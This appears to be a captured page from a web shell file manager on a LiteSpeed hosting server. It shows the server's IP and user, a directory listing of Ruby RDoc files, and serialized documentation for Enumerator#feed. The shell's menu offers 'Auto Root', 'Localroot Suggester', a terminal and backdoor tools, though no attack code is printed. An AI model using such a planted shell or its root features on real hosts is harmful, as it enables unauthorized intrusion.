Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
Enumerator /
Delete
Unzip
Name
Size
Permission
Date
Action
ArithmeticSequence
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Chain
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Generator
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Lazy
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Producer
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
Yielder
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
%2b-i.ri
515
B
-rw-r--r--
2024-06-26 17:25
cdesc-Enumerator.ri
3.79
KB
-rw-r--r--
2024-06-26 17:25
each-i.ri
1.53
KB
-rw-r--r--
2024-06-26 17:25
each_with_index-i.ri
538
B
-rw-r--r--
2024-06-26 17:25
each_with_object-i.ri
1.04
KB
-rw-r--r--
2024-06-26 17:25
feed-i.ri
1.62
KB
-rw-r--r--
2024-06-26 17:25
inspect-i.ri
341
B
-rw-r--r--
2024-06-26 17:25
new-c.ri
1.05
KB
-rw-r--r--
2024-06-26 17:25
next-i.ri
783
B
-rw-r--r--
2024-06-26 17:25
next_values-i.ri
1.43
KB
-rw-r--r--
2024-06-26 17:25
peek-i.ri
872
B
-rw-r--r--
2024-06-26 17:25
peek_values-i.ri
1.03
KB
-rw-r--r--
2024-06-26 17:25
produce-c.ri
1.79
KB
-rw-r--r--
2024-06-26 17:25
rewind-i.ri
453
B
-rw-r--r--
2024-06-26 17:25
size-i.ri
599
B
-rw-r--r--
2024-06-26 17:25
with_index-i.ri
724
B
-rw-r--r--
2024-06-26 17:25
with_object-i.ri
923
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI" feed:ETI"Enumerator#feed;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"@Sets the value to be returned by the next yield inside +e+.;To:RDoc::Markup::BlankLine o; ; [I"4If the value is not set, the yield returns nil.;T@o; ; [I"/This value is cleared after being yielded.;T@o:RDoc::Markup::Verbatim; ['I"I# Array#map passes the array's elements to "yield" and collects the ;TI"'# results of "yield" as an array. ;TI"K# Following example shows that "next" returns the passed elements and ;TI"F# values passed to "feed" are collected as an array which can be ;TI")# obtained by StopIteration#result. ;TI"e = [1,2,3].map ;TI"p e.next #=> 1 ;TI"e.feed "a" ;TI"p e.next #=> 2 ;TI"e.feed "b" ;TI"p e.next #=> 3 ;TI"e.feed "c" ;TI"begin ;TI" e.next ;TI"rescue StopIteration ;TI", p $!.result #=> ["a", "b", "c"] ;TI" end ;TI" ;TI"o = Object.new ;TI"def o.each ;TI"& x = yield # (2) blocks ;TI"( p x # (5) => "foo" ;TI"& x = yield # (6) blocks ;TI"& p x # (8) => nil ;TI"& x = yield # (9) blocks ;TI": p x # not reached w/o another e.next ;TI" end ;TI" ;TI"e = o.to_enum ;TI"e.next # (1) ;TI"e.feed "foo" # (3) ;TI"e.next # (4) ;TI"e.next # (7) ;TI" # (10);T:@format0: @fileI"enumerator.c;T:0@omit_headings_from_table_of_contents_below0I"e.feed obj -> nil ;T0[ I" (p1);T@9FI"Enumerator;TcRDoc::NormalClass00